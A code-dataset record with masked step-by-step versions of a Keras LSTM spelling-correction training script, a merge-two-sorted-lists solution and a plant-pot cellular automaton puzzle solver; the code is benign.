'\\x1b[0m'\n\n\ndef show_samples(model, dataset, epoch, logs, X_dev_batch, y_dev_batch):\n \"\"\"Selects 10 samples from the dev set at random so we can visualize errors\"\"\"\n for _ in range(10):\n ind = random_randint(0, len(X_dev_batch))\n row_X, row_y = X_dev_batch[np.array([ind])], y_dev_batch[np.array([\n ind])]\n preds = model.predict_classes(row_X, verbose=0)\n q = dataset.character_table.decode(row_X[0])\n correct = dataset.character_table.decode(row_y[0])\n guess = dataset.character_table.decode(preds[0], calc_argmax=False)\n if INVERTED:\n print('Q', q[::-1])\n else:\n print('Q', q)\n print('A', correct)\n print(Colors.ok + '☑' + Colors.close if correct == guess else \n Colors.fail + '☒' + Colors.close, guess)\n print('---')\n\n\ndef iterate_training(model, dataset, initial_epoch):\n \"\"\"Iterative Training\"\"\"\n checkpoint = ModelCheckpoint(MODEL_CHECKPOINT_DIRECTORYNAME + '/' +\n MODEL_CHECKPOINT_FILENAME, save_best_only=True)\n tensorboard = TensorBoard()\n csv_logger = CSVLogger(CSV_LOG_FILENAME)\n X_dev_batch, y_dev_batch = next(dataset.dev_set_batch_generator(1000))\n show_samples_callback = LambdaCallback(on_epoch_end=lambda epoch, logs:\n show_samples(model, dataset, epoch, logs, X_dev_batch, y_dev_batch))\n train_batch_generator = dataset.train_set_batch_generator(BATCH_SIZE)\n validation_batch_generator = dataset.dev_set_batch_generator(BATCH_SIZE)\n model.fit_generator(train_batch_generator, samples_per_epoch=\n SAMPLES_PER_EPOCH, nb_epoch=NUMBER_OF_EPOCHS, validation_data=\n validation_batch_generator, nb_val_samples=SAMPLES_PER_EPOCH,\n callbacks=[checkpoint, tensorboard, csv_logger,\n show_samples_callback], verbose=1, initial_epoch=initial_epoch)\n\n\ndef save_dataset_params(dataset):\n params = {'chars': dataset.chars, 'y_max_length': dataset.y_max_length}\n with open(MODEL_CHECKPOINT_DIRECTORYNAME + '/' +\n MODEL_DATASET_PARAMS_FILENAME, 'wb') as f:\n pickle.dump(params, f)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef generate_model(output_len, chars=None):\n \"\"\"Generate the model\"\"\"\n print('Build model...')\n chars = chars or CHARS\n model = Sequential()\n for layer_number in range(INPUT_LAYERS):\n model.add(recurrent.LSTM(HIDDEN_SIZE, input_shape=(None, len(chars)\n ), init=INITIALIZATION, return_sequences=layer_number + 1 <\n INPUT_LAYERS))\n model.add(Dropout(AMOUNT_OF_DROPOUT))\n model.add(RepeatVector(output_len))\n for _ in range(OUTPUT_LAYERS):\n model.add(recurrent.LSTM(HIDDEN_SIZE, return_sequences=True, init=\n INITIALIZATION))\n model.add(Dropout(AMOUNT_OF_DROPOUT))\n model.add(TimeDistributed(Dense(len(chars), init=INITIALIZATION)))\n model.add(Activation('softmax'))\n model.compile(loss='categorical_crossentropy', optimizer='adam',\n metrics=['accuracy'])\n return model\n\n\nclass Colors(object):\n \"\"\"For nicer printouts\"\"\"\n ok = '\\x1b[92m'\n fail = '\\x1b[91m'\n close = '\\x1b[0m'\n\n\ndef show_samples(model, dataset, epoch, logs, X_dev_batch, y_dev_batch):\n \"\"\"Selects 10 samples from the dev set at random so we can visualize errors\"\"\"\n for _ in range(10):\n ind = random_randint(0, len(X_dev_batch))\n row_X, row_y = X_dev_batch[np.array([ind])], y_dev_batch[np.array([\n ind])]\n preds = model.predict_classes(row_X, verbose=0)\n q = dataset.character_table.decode(row_X[0])\n correct = dataset.character_table.decode(row_y[0])\n guess = dataset.character_table.decode(preds[0], calc_argmax=False)\n if INVERTED:\n print('Q', q[::-1])\n else:\n print('Q', q)\n print('A', correct)\n print(Colors.ok + '☑' + Colors.close if correct == guess else \n Colors.fail + '☒' + Colors.close, guess)\n print('---')\n\n\ndef iterate_training(model, dataset, initial_epoch):\n \"\"\"Iterative Training\"\"\"\n checkpoint = ModelCheckpoint(MODEL_CHECKPOINT_DIRECTORYNAME + '/' +\n MODEL_CHECKPOINT_FILENAME, save_best_only=True)\n tensorboard = TensorBoard()\n csv_logger = CSVLogger(CSV_LOG_FILENAME)\n X_dev_batch, y_dev_batch = next(dataset.dev_set_batch_generator(1000))\n show_samples_callback = LambdaCallback(on_epoch_end=lambda epoch, logs:\n show_samples(model, dataset, epoch, logs, X_dev_batch, y_dev_batch))\n train_batch_generator = dataset.train_set_batch_generator(BATCH_SIZE)\n validation_batch_generator = dataset.dev_set_batch_generator(BATCH_SIZE)\n model.fit_generator(train_batch_generator, samples_per_epoch=\n SAMPLES_PER_EPOCH, nb_epoch=NUMBER_OF_EPOCHS, validation_data=\n validation_batch_generator, nb_val_samples=SAMPLES_PER_EPOCH,\n callbacks=[checkpoint, tensorboard, csv_logger,\n show_samples_callback], verbose=1, initial_epoch=initial_epoch)\n\n\ndef save_dataset_params(dataset):\n params = {'chars': dataset.chars, 'y_max_length': dataset.y_max_length}\n with open(MODEL_CHECKPOINT_DIRECTORYNAME + '/' +\n MODEL_DATASET_PARAMS_FILENAME, 'wb') as f:\n pickle.dump(params, f)\n\n\ndef main_news(checkpoint_filename=None, dataset_params_filename=None,\n initial_epoch=1):\n \"\"\"Main\"\"\"\n dataset = DataSet(DATASET_FILENAME)\n if not os.path.exists(MODEL_CHECKPOINT_DIRECTORYNAME):\n os.makedirs(MODEL_CHECKPOINT_DIRECTORYNAME)\n if dataset_params_filename is not None:\n with open(dataset_params_filename, 'rb') as f:\n dataset_params = pickle.load(f)\n assert dataset_params['chars'] == dataset.chars\n assert dataset_params['y_max_length'] == dataset.y_max_length\n else:\n save_dataset_params(dataset)\n model = generate_model(dataset.y_max_length, dataset.chars)\n if checkpoint_filename is not None:\n model.load_weights(checkpoint_filename)\n 
iterate_training(model, dataset, initial_epoch)\n\n\n<mask token>\n",
"step-4": "<mask token>\nrandom_seed(123)\nDATASET_FILENAME = 'data/dataset/news.2011.en.shuffled'\nNUMBER_OF_EPOCHS = 100000\nRNN = recurrent.LSTM\nINPUT_LAYERS = 2\nOUTPUT_LAYERS = 2\nAMOUNT_OF_DROPOUT = 0.3\nBATCH_SIZE = 32\nSAMPLES_PER_EPOCH = 65536\nHIDDEN_SIZE = 700\nINITIALIZATION = 'he_normal'\nNUMBER_OF_CHARS = 100\nCHARS = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ .')\nINVERTED = True\nMODEL_CHECKPOINT_DIRECTORYNAME = 'models'\nMODEL_CHECKPOINT_FILENAME = 'weights.{epoch:02d}-{val_loss:.2f}.hdf5'\nMODEL_DATASET_PARAMS_FILENAME = 'dataset_params.pickle'\nMODEL_STARTING_CHECKPOINT_FILENAME = 'weights.hdf5'\nCSV_LOG_FILENAME = 'log.csv'\n\n\ndef generate_model(output_len, chars=None):\n \"\"\"Generate the model\"\"\"\n print('Build model...')\n chars = chars or CHARS\n model = Sequential()\n for layer_number in range(INPUT_LAYERS):\n model.add(recurrent.LSTM(HIDDEN_SIZE, input_shape=(None, len(chars)\n ), init=INITIALIZATION, return_sequences=layer_number + 1 <\n INPUT_LAYERS))\n model.add(Dropout(AMOUNT_OF_DROPOUT))\n model.add(RepeatVector(output_len))\n for _ in range(OUTPUT_LAYERS):\n model.add(recurrent.LSTM(HIDDEN_SIZE, return_sequences=True, init=\n INITIALIZATION))\n model.add(Dropout(AMOUNT_OF_DROPOUT))\n model.add(TimeDistributed(Dense(len(chars), init=INITIALIZATION)))\n model.add(Activation('softmax'))\n model.compile(loss='categorical_crossentropy', optimizer='adam',\n metrics=['accuracy'])\n return model\n\n\nclass Colors(object):\n \"\"\"For nicer printouts\"\"\"\n ok = '\\x1b[92m'\n fail = '\\x1b[91m'\n close = '\\x1b[0m'\n\n\ndef show_samples(model, dataset, epoch, logs, X_dev_batch, y_dev_batch):\n \"\"\"Selects 10 samples from the dev set at random so we can visualize errors\"\"\"\n for _ in range(10):\n ind = random_randint(0, len(X_dev_batch))\n row_X, row_y = X_dev_batch[np.array([ind])], y_dev_batch[np.array([\n ind])]\n preds = model.predict_classes(row_X, verbose=0)\n q = dataset.character_table.decode(row_X[0])\n correct = dataset.character_table.decode(row_y[0])\n guess = dataset.character_table.decode(preds[0], calc_argmax=False)\n if INVERTED:\n print('Q', q[::-1])\n else:\n print('Q', q)\n print('A', correct)\n print(Colors.ok + '☑' + Colors.close if correct == guess else \n Colors.fail + '☒' + Colors.close, guess)\n print('---')\n\n\ndef iterate_training(model, dataset, initial_epoch):\n \"\"\"Iterative Training\"\"\"\n checkpoint = ModelCheckpoint(MODEL_CHECKPOINT_DIRECTORYNAME + '/' +\n MODEL_CHECKPOINT_FILENAME, save_best_only=True)\n tensorboard = TensorBoard()\n csv_logger = CSVLogger(CSV_LOG_FILENAME)\n X_dev_batch, y_dev_batch = next(dataset.dev_set_batch_generator(1000))\n show_samples_callback = LambdaCallback(on_epoch_end=lambda epoch, logs:\n show_samples(model, dataset, epoch, logs, X_dev_batch, y_dev_batch))\n train_batch_generator = dataset.train_set_batch_generator(BATCH_SIZE)\n validation_batch_generator = dataset.dev_set_batch_generator(BATCH_SIZE)\n model.fit_generator(train_batch_generator, samples_per_epoch=\n SAMPLES_PER_EPOCH, nb_epoch=NUMBER_OF_EPOCHS, validation_data=\n validation_batch_generator, nb_val_samples=SAMPLES_PER_EPOCH,\n callbacks=[checkpoint, tensorboard, csv_logger,\n show_samples_callback], verbose=1, initial_epoch=initial_epoch)\n\n\ndef save_dataset_params(dataset):\n params = {'chars': dataset.chars, 'y_max_length': dataset.y_max_length}\n with open(MODEL_CHECKPOINT_DIRECTORYNAME + '/' +\n MODEL_DATASET_PARAMS_FILENAME, 'wb') as f:\n pickle.dump(params, f)\n\n\ndef 
main_news(checkpoint_filename=None, dataset_params_filename=None,\n initial_epoch=1):\n \"\"\"Main\"\"\"\n dataset = DataSet(DATASET_FILENAME)\n if not os.path.exists(MODEL_CHECKPOINT_DIRECTORYNAME):\n os.makedirs(MODEL_CHECKPOINT_DIRECTORYNAME)\n if dataset_params_filename is not None:\n with open(dataset_params_filename, 'rb') as f:\n dataset_params = pickle.load(f)\n assert dataset_params['chars'] == dataset.chars\n assert dataset_params['y_max_length'] == dataset.y_max_length\n else:\n save_dataset_params(dataset)\n model = generate_model(dataset.y_max_length, dataset.chars)\n if checkpoint_filename is not None:\n model.load_weights(checkpoint_filename)\n iterate_training(model, dataset, initial_epoch)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\n 'Trains a deep spelling model.')\n parser.add_argument('--checkpoint', type=str, help=\n 'Filename of a model checkpoint to start the training from.')\n parser.add_argument('--datasetparams', type=str, help=\n 'Filename of a file with dataset params to load for continuing model training.'\n )\n parser.add_argument('--initialepoch', type=int, help=\n 'Initial epoch parameter for continuing model training.', default=0)\n args = parser.parse_args()\n main_news(args.checkpoint, args.datasetparams, args.initialepoch)\n",
"step-5": "# encoding: utf-8\n'''\nCreated on Nov 26, 2015\n\n@author: tal\n\nBased in part on:\nLearn math - https://github.com/fchollet/keras/blob/master/examples/addition_rnn.py\n\nSee https://medium.com/@majortal/deep-spelling-9ffef96a24f6#.2c9pu8nlm\n\"\"\"\n\nModified by Pavel Surmenok\n\n'''\n\nimport argparse\nimport numpy as np\nfrom keras.layers import Activation, TimeDistributed, Dense, RepeatVector, Dropout\nfrom keras.layers import recurrent\nfrom keras.models import Sequential\nfrom keras.callbacks import ModelCheckpoint, TensorBoard, CSVLogger, LambdaCallback\nfrom numpy.random import seed as random_seed\nfrom numpy.random import randint as random_randint\nimport os\nimport pickle\n\nfrom data import DataSet\n\nrandom_seed(123) # Reproducibility\n\n# Parameters for the model and dataset\nDATASET_FILENAME = 'data/dataset/news.2011.en.shuffled'\nNUMBER_OF_EPOCHS = 100000\nRNN = recurrent.LSTM\nINPUT_LAYERS = 2\nOUTPUT_LAYERS = 2\nAMOUNT_OF_DROPOUT = 0.3\nBATCH_SIZE = 32\nSAMPLES_PER_EPOCH = 65536\nHIDDEN_SIZE = 700\nINITIALIZATION = \"he_normal\" # : Gaussian initialization scaled by fan_in (He et al., 2014)\nNUMBER_OF_CHARS = 100 # 75\nCHARS = list(\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ .\")\nINVERTED = True\nMODEL_CHECKPOINT_DIRECTORYNAME = 'models'\nMODEL_CHECKPOINT_FILENAME = 'weights.{epoch:02d}-{val_loss:.2f}.hdf5'\nMODEL_DATASET_PARAMS_FILENAME = 'dataset_params.pickle'\nMODEL_STARTING_CHECKPOINT_FILENAME = 'weights.hdf5'\nCSV_LOG_FILENAME = 'log.csv'\n\n\ndef generate_model(output_len, chars=None):\n \"\"\"Generate the model\"\"\"\n print('Build model...')\n chars = chars or CHARS\n model = Sequential()\n # \"Encode\" the input sequence using an RNN, producing an output of HIDDEN_SIZE\n # note: in a situation where your input sequences have a variable length,\n # use input_shape=(None, nb_feature).\n for layer_number in range(INPUT_LAYERS):\n model.add(recurrent.LSTM(HIDDEN_SIZE, input_shape=(None, len(chars)), init=INITIALIZATION,\n return_sequences=layer_number + 1 < INPUT_LAYERS))\n model.add(Dropout(AMOUNT_OF_DROPOUT))\n # For the decoder's input, we repeat the encoded input for each time step\n model.add(RepeatVector(output_len))\n # The decoder RNN could be multiple layers stacked or a single layer\n for _ in range(OUTPUT_LAYERS):\n model.add(recurrent.LSTM(HIDDEN_SIZE, return_sequences=True, init=INITIALIZATION))\n model.add(Dropout(AMOUNT_OF_DROPOUT))\n\n # For each of step of the output sequence, decide which character should be chosen\n model.add(TimeDistributed(Dense(len(chars), init=INITIALIZATION)))\n model.add(Activation('softmax'))\n\n model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n return model\n\n\nclass Colors(object):\n \"\"\"For nicer printouts\"\"\"\n ok = '\\033[92m'\n fail = '\\033[91m'\n close = '\\033[0m'\n\n\ndef show_samples(model, dataset, epoch, logs, X_dev_batch, y_dev_batch):\n \"\"\"Selects 10 samples from the dev set at random so we can visualize errors\"\"\"\n\n for _ in range(10):\n ind = random_randint(0, len(X_dev_batch))\n row_X, row_y = X_dev_batch[np.array([ind])], y_dev_batch[np.array([ind])]\n preds = model.predict_classes(row_X, verbose=0)\n q = dataset.character_table.decode(row_X[0])\n correct = dataset.character_table.decode(row_y[0])\n guess = dataset.character_table.decode(preds[0], calc_argmax=False)\n\n if INVERTED:\n print('Q', q[::-1]) # inverted back!\n else:\n print('Q', q)\n\n print('A', correct)\n print(Colors.ok + '☑' + Colors.close if correct == guess else 
Colors.fail + '☒' + Colors.close, guess)\n print('---')\n\n\n\ndef iterate_training(model, dataset, initial_epoch):\n \"\"\"Iterative Training\"\"\"\n\n checkpoint = ModelCheckpoint(MODEL_CHECKPOINT_DIRECTORYNAME + '/' + MODEL_CHECKPOINT_FILENAME,\n save_best_only=True)\n tensorboard = TensorBoard()\n csv_logger = CSVLogger(CSV_LOG_FILENAME)\n\n X_dev_batch, y_dev_batch = next(dataset.dev_set_batch_generator(1000))\n show_samples_callback = LambdaCallback(\n on_epoch_end=lambda epoch, logs: show_samples(model, dataset, epoch, logs, X_dev_batch, y_dev_batch))\n\n train_batch_generator = dataset.train_set_batch_generator(BATCH_SIZE)\n validation_batch_generator = dataset.dev_set_batch_generator(BATCH_SIZE)\n\n model.fit_generator(train_batch_generator,\n samples_per_epoch=SAMPLES_PER_EPOCH,\n nb_epoch=NUMBER_OF_EPOCHS,\n validation_data=validation_batch_generator,\n nb_val_samples=SAMPLES_PER_EPOCH,\n callbacks=[checkpoint, tensorboard, csv_logger, show_samples_callback],\n verbose=1,\n initial_epoch=initial_epoch)\n\n\ndef save_dataset_params(dataset):\n params = { 'chars': dataset.chars, 'y_max_length': dataset.y_max_length }\n with open(MODEL_CHECKPOINT_DIRECTORYNAME + '/' + MODEL_DATASET_PARAMS_FILENAME, 'wb') as f:\n pickle.dump(params, f)\n\n\ndef main_news(checkpoint_filename=None, dataset_params_filename=None, initial_epoch=1):\n \"\"\"Main\"\"\"\n dataset = DataSet(DATASET_FILENAME)\n\n if not os.path.exists(MODEL_CHECKPOINT_DIRECTORYNAME):\n os.makedirs(MODEL_CHECKPOINT_DIRECTORYNAME)\n\n if dataset_params_filename is not None:\n with open(dataset_params_filename, 'rb') as f:\n dataset_params = pickle.load(f)\n\n assert dataset_params['chars'] == dataset.chars\n assert dataset_params['y_max_length'] == dataset.y_max_length\n\n else:\n save_dataset_params(dataset)\n\n model = generate_model(dataset.y_max_length, dataset.chars)\n\n if checkpoint_filename is not None:\n model.load_weights(checkpoint_filename)\n\n iterate_training(model, dataset, initial_epoch)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Trains a deep spelling model.')\n parser.add_argument('--checkpoint', type=str,\n help='Filename of a model checkpoint to start the training from.')\n parser.add_argument('--datasetparams', type=str,\n help='Filename of a file with dataset params to load for continuing model training.')\n parser.add_argument('--initialepoch', type=int,\n help='Initial epoch parameter for continuing model training.', default=0)\n\n args = parser.parse_args()\n\n main_news(args.checkpoint, args.datasetparams, args.initialepoch)\n",
"step-ids": [
6,
7,
8,
10,
12
]
}
|
[
6,
7,
8,
10,
12
] |
# Classic solution for merging two sorted arrays/lists into a new one.
# (Based on the merge step of Merge Sort)
from typing import List

class Solution:
    def merge(self, nums1: List[int], m: int, nums2: List[int], n: int) -> List[int]:
        """
        m -> size of nums1 list
        n -> size of nums2 list
        Returns a new merged list (does not merge in place).
        """
mergedArray = []
i = 0
j = 0
while(i < m and j < n):
if(nums1[i] <= nums2[j]):
mergedArray.append(nums1[i])
i += 1
else:
mergedArray.append(nums2[j])
j += 1
while(i < m):
mergedArray.append(nums1[i])
i += 1
while(j < n):
mergedArray.append(nums2[j])
j += 1
return mergedArray
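

# Minimal usage sketch (not part of the original solution): call merge()
# directly with explicit lengths, mirroring the signature above.
if __name__ == "__main__":
    print(Solution().merge([1, 3, 5], 3, [2, 4, 6], 3))  # [1, 2, 3, 4, 5, 6]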
|
normal
|
{
"blob_id": "a732e7141ffb403ca6c5d9c4204cb96c8e831aab",
"index": 6814,
"step-1": "<mask token>\n",
"step-2": "class Solution:\n <mask token>\n",
"step-3": "class Solution:\n\n def merge(self, nums1: List[int], m: int, nums2: List[int], n: int) ->None:\n \"\"\"\n m->Size of nums1 list\n n->Size of nums2 list\n \"\"\"\n mergedArray = []\n i = 0\n j = 0\n while i < m and j < n:\n if nums1[i] <= nums2[j]:\n mergedArray.append(nums1[i])\n i += 1\n else:\n mergedArray.append(nums2[j])\n j += 1\n while i < m:\n mergedArray.append(nums1[i])\n i += 1\n while j < n:\n mergedArray.append(nums2[j])\n j += 1\n return mergedArray\n",
"step-4": "# Classic solution for merging two sorted arrays/list to a new one.\n# (Based on Merge Sort)\nclass Solution:\n def merge(self, nums1: List[int], m: int, nums2: List[int], n: int) -> None:\n \"\"\"\n m->Size of nums1 list\n n->Size of nums2 list\n \"\"\"\n mergedArray = []\n i = 0 \n j = 0\n while(i < m and j < n):\n if(nums1[i] <= nums2[j]):\n mergedArray.append(nums1[i])\n i += 1\n else:\n mergedArray.append(nums2[j])\n j += 1\n while(i < m):\n mergedArray.append(nums1[i])\n i += 1\n while(j < n):\n mergedArray.append(nums2[j])\n j += 1\n return mergedArray",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class Rule:
def __init__(self, template, alive):
self.template = template
self.alive = alive
def parse(string):
match = rule_regex.match(string)
if match:
template = match.group(1)
alive = match.group(2)
return Rule(template, alive)
return None
<|reserved_special_token_0|>
def apply_rule(segment, rule):
if segment == rule.template:
return rule.alive
return None
def advance(grid, rules):
augmented_grid = '.....' + grid + '.....'
grid = ['.' for x in range(0, len(augmented_grid))]
for pos in range(2, len(augmented_grid) - 2):
for rule in rules:
result = apply_rule(augmented_grid[pos - 2:pos + 3], rule)
if result:
grid[pos] = result
first_hash = grid.index('#')
last_hash = len(grid) - 1 - grid[::-1].index('#')
offset_delta = first_hash - 5
return ''.join(grid[first_hash:last_hash + 1]), offset_delta
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Rule:
def __init__(self, template, alive):
self.template = template
self.alive = alive
def parse(string):
match = rule_regex.match(string)
if match:
template = match.group(1)
alive = match.group(2)
return Rule(template, alive)
return None
<|reserved_special_token_0|>
def apply_rule(segment, rule):
if segment == rule.template:
return rule.alive
return None
def advance(grid, rules):
augmented_grid = '.....' + grid + '.....'
grid = ['.' for x in range(0, len(augmented_grid))]
for pos in range(2, len(augmented_grid) - 2):
for rule in rules:
result = apply_rule(augmented_grid[pos - 2:pos + 3], rule)
if result:
grid[pos] = result
first_hash = grid.index('#')
last_hash = len(grid) - 1 - grid[::-1].index('#')
offset_delta = first_hash - 5
return ''.join(grid[first_hash:last_hash + 1]), offset_delta
def find_sum(grid, offset):
sum = 0
for i in range(0, len(grid)):
if grid[i] == '#':
sum = sum + i + offset
return sum
def main():
grid, rules = read_input('./input/input.dat')
offset = 0
sum = find_sum(grid, offset)
print(grid)
for i in range(1, 1000):
new_grid, offset_delta = advance(grid, rules)
offset = offset + offset_delta
new_sum = find_sum(new_grid, offset)
sum_diff = new_sum - sum
print(i, ': grid length = ', len(new_grid), ' offset = ', offset,
' sum = ', new_sum)
if new_grid == grid:
print('found repeated grids:')
break
grid = new_grid
sum = new_sum
target_year = 50000000000
print('sum at {} = {}'.format(target_year, new_sum + sum_diff * (
target_year - i)))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Rule:
def __init__(self, template, alive):
self.template = template
self.alive = alive
def parse(string):
match = rule_regex.match(string)
if match:
template = match.group(1)
alive = match.group(2)
return Rule(template, alive)
return None
def read_input(path):
init_grid = ''
rules = []
with open(path) as infile:
cnt = 0
for line in infile:
if cnt == 0:
init_grid = grid_regex.match(line).group(1)
elif cnt > 1:
rules.append(Rule.parse(line))
cnt = cnt + 1
return init_grid, rules
def apply_rule(segment, rule):
if segment == rule.template:
return rule.alive
return None
def advance(grid, rules):
augmented_grid = '.....' + grid + '.....'
grid = ['.' for x in range(0, len(augmented_grid))]
for pos in range(2, len(augmented_grid) - 2):
for rule in rules:
result = apply_rule(augmented_grid[pos - 2:pos + 3], rule)
if result:
grid[pos] = result
first_hash = grid.index('#')
last_hash = len(grid) - 1 - grid[::-1].index('#')
offset_delta = first_hash - 5
return ''.join(grid[first_hash:last_hash + 1]), offset_delta
def find_sum(grid, offset):
sum = 0
for i in range(0, len(grid)):
if grid[i] == '#':
sum = sum + i + offset
return sum
def main():
grid, rules = read_input('./input/input.dat')
offset = 0
sum = find_sum(grid, offset)
print(grid)
for i in range(1, 1000):
new_grid, offset_delta = advance(grid, rules)
offset = offset + offset_delta
new_sum = find_sum(new_grid, offset)
sum_diff = new_sum - sum
print(i, ': grid length = ', len(new_grid), ' offset = ', offset,
' sum = ', new_sum)
if new_grid == grid:
print('found repeated grids:')
break
grid = new_grid
sum = new_sum
target_year = 50000000000
print('sum at {} = {}'.format(target_year, new_sum + sum_diff * (
target_year - i)))
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
rule_regex = re.compile('([\\.#]{5}) => ([\\.#])')
grid_regex = re.compile('initial state: ([\\.#]+)')
class Rule:
def __init__(self, template, alive):
self.template = template
self.alive = alive
def parse(string):
match = rule_regex.match(string)
if match:
template = match.group(1)
alive = match.group(2)
return Rule(template, alive)
return None
def read_input(path):
init_grid = ''
rules = []
with open(path) as infile:
cnt = 0
for line in infile:
if cnt == 0:
init_grid = grid_regex.match(line).group(1)
elif cnt > 1:
rules.append(Rule.parse(line))
cnt = cnt + 1
return init_grid, rules
def apply_rule(segment, rule):
if segment == rule.template:
return rule.alive
return None
def advance(grid, rules):
augmented_grid = '.....' + grid + '.....'
grid = ['.' for x in range(0, len(augmented_grid))]
for pos in range(2, len(augmented_grid) - 2):
for rule in rules:
result = apply_rule(augmented_grid[pos - 2:pos + 3], rule)
if result:
grid[pos] = result
first_hash = grid.index('#')
last_hash = len(grid) - 1 - grid[::-1].index('#')
offset_delta = first_hash - 5
return ''.join(grid[first_hash:last_hash + 1]), offset_delta
def find_sum(grid, offset):
sum = 0
for i in range(0, len(grid)):
if grid[i] == '#':
sum = sum + i + offset
return sum
def main():
grid, rules = read_input('./input/input.dat')
offset = 0
sum = find_sum(grid, offset)
print(grid)
for i in range(1, 1000):
new_grid, offset_delta = advance(grid, rules)
offset = offset + offset_delta
new_sum = find_sum(new_grid, offset)
sum_diff = new_sum - sum
print(i, ': grid length = ', len(new_grid), ' offset = ', offset,
' sum = ', new_sum)
if new_grid == grid:
print('found repeated grids:')
break
grid = new_grid
sum = new_sum
target_year = 50000000000
print('sum at {} = {}'.format(target_year, new_sum + sum_diff * (
target_year - i)))
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
import re
rule_regex = re.compile(r'([\.#]{5}) => ([\.#])')
grid_regex = re.compile(r'initial state: ([\.#]+)')
class Rule:
def __init__(self, template, alive):
self.template = template
self.alive = alive
def parse(string):
match = rule_regex.match(string)
if match:
template = match.group(1)
alive = match.group(2)
return Rule(template, alive)
return None
def read_input(path):
init_grid = ''
rules = []
with open(path) as infile:
cnt = 0
for line in infile:
if cnt == 0:
init_grid = grid_regex.match(line).group(1)
elif cnt > 1:
rules.append(Rule.parse(line))
cnt = cnt + 1
return init_grid, rules
def apply_rule(segment, rule):
if segment == rule.template:
return rule.alive
return None
def advance(grid, rules):
augmented_grid = "....." + grid + "....."
grid = ['.' for x in range(0, len(augmented_grid))]
for pos in range(2, len(augmented_grid)-2):
for rule in rules:
result = apply_rule(augmented_grid[pos-2:pos+3], rule)
if result:
grid[pos] = result
first_hash = grid.index('#')
last_hash = len(grid) - 1 - grid[::-1].index('#')
offset_delta = first_hash-5
return ''.join(grid[first_hash:last_hash+1]), offset_delta
def find_sum(grid, offset):
sum = 0
for i in range(0,len(grid)):
if grid[i] == '#':
sum = sum + i+offset
return sum
def main():
grid, rules = read_input('./input/input.dat')
offset = 0
sum = find_sum(grid, offset)
print(grid)
for i in range(1, 1000):
new_grid, offset_delta = advance(grid, rules)
offset = offset + offset_delta
new_sum = find_sum(new_grid, offset)
sum_diff = new_sum - sum
print(i, ": grid length = ", len(new_grid), " offset = ", offset, " sum = ", new_sum)
if new_grid == grid:
print("found repeated grids:")
break
grid = new_grid
sum = new_sum
target_year = 50000000000
print("sum at {} = {}".format(target_year, new_sum + sum_diff*(target_year-i)))
if __name__== "__main__":
main()
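
# Illustrative layout of ./input/input.dat (inferred from grid_regex, rule_regex
# and read_input above; the specific patterns are placeholders):
#   initial state: #..#.#..##......###...###
#   (blank line)
#   ...## => #
#   ..#.. => .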
|
flexible
|
{
"blob_id": "8c683c109aba69f296b8989915b1f3b3eecd9745",
"index": 4274,
"step-1": "<mask token>\n\n\nclass Rule:\n\n def __init__(self, template, alive):\n self.template = template\n self.alive = alive\n\n def parse(string):\n match = rule_regex.match(string)\n if match:\n template = match.group(1)\n alive = match.group(2)\n return Rule(template, alive)\n return None\n\n\n<mask token>\n\n\ndef apply_rule(segment, rule):\n if segment == rule.template:\n return rule.alive\n return None\n\n\ndef advance(grid, rules):\n augmented_grid = '.....' + grid + '.....'\n grid = ['.' for x in range(0, len(augmented_grid))]\n for pos in range(2, len(augmented_grid) - 2):\n for rule in rules:\n result = apply_rule(augmented_grid[pos - 2:pos + 3], rule)\n if result:\n grid[pos] = result\n first_hash = grid.index('#')\n last_hash = len(grid) - 1 - grid[::-1].index('#')\n offset_delta = first_hash - 5\n return ''.join(grid[first_hash:last_hash + 1]), offset_delta\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Rule:\n\n def __init__(self, template, alive):\n self.template = template\n self.alive = alive\n\n def parse(string):\n match = rule_regex.match(string)\n if match:\n template = match.group(1)\n alive = match.group(2)\n return Rule(template, alive)\n return None\n\n\n<mask token>\n\n\ndef apply_rule(segment, rule):\n if segment == rule.template:\n return rule.alive\n return None\n\n\ndef advance(grid, rules):\n augmented_grid = '.....' + grid + '.....'\n grid = ['.' for x in range(0, len(augmented_grid))]\n for pos in range(2, len(augmented_grid) - 2):\n for rule in rules:\n result = apply_rule(augmented_grid[pos - 2:pos + 3], rule)\n if result:\n grid[pos] = result\n first_hash = grid.index('#')\n last_hash = len(grid) - 1 - grid[::-1].index('#')\n offset_delta = first_hash - 5\n return ''.join(grid[first_hash:last_hash + 1]), offset_delta\n\n\ndef find_sum(grid, offset):\n sum = 0\n for i in range(0, len(grid)):\n if grid[i] == '#':\n sum = sum + i + offset\n return sum\n\n\ndef main():\n grid, rules = read_input('./input/input.dat')\n offset = 0\n sum = find_sum(grid, offset)\n print(grid)\n for i in range(1, 1000):\n new_grid, offset_delta = advance(grid, rules)\n offset = offset + offset_delta\n new_sum = find_sum(new_grid, offset)\n sum_diff = new_sum - sum\n print(i, ': grid length = ', len(new_grid), ' offset = ', offset,\n ' sum = ', new_sum)\n if new_grid == grid:\n print('found repeated grids:')\n break\n grid = new_grid\n sum = new_sum\n target_year = 50000000000\n print('sum at {} = {}'.format(target_year, new_sum + sum_diff * (\n target_year - i)))\n\n\n<mask token>\n",
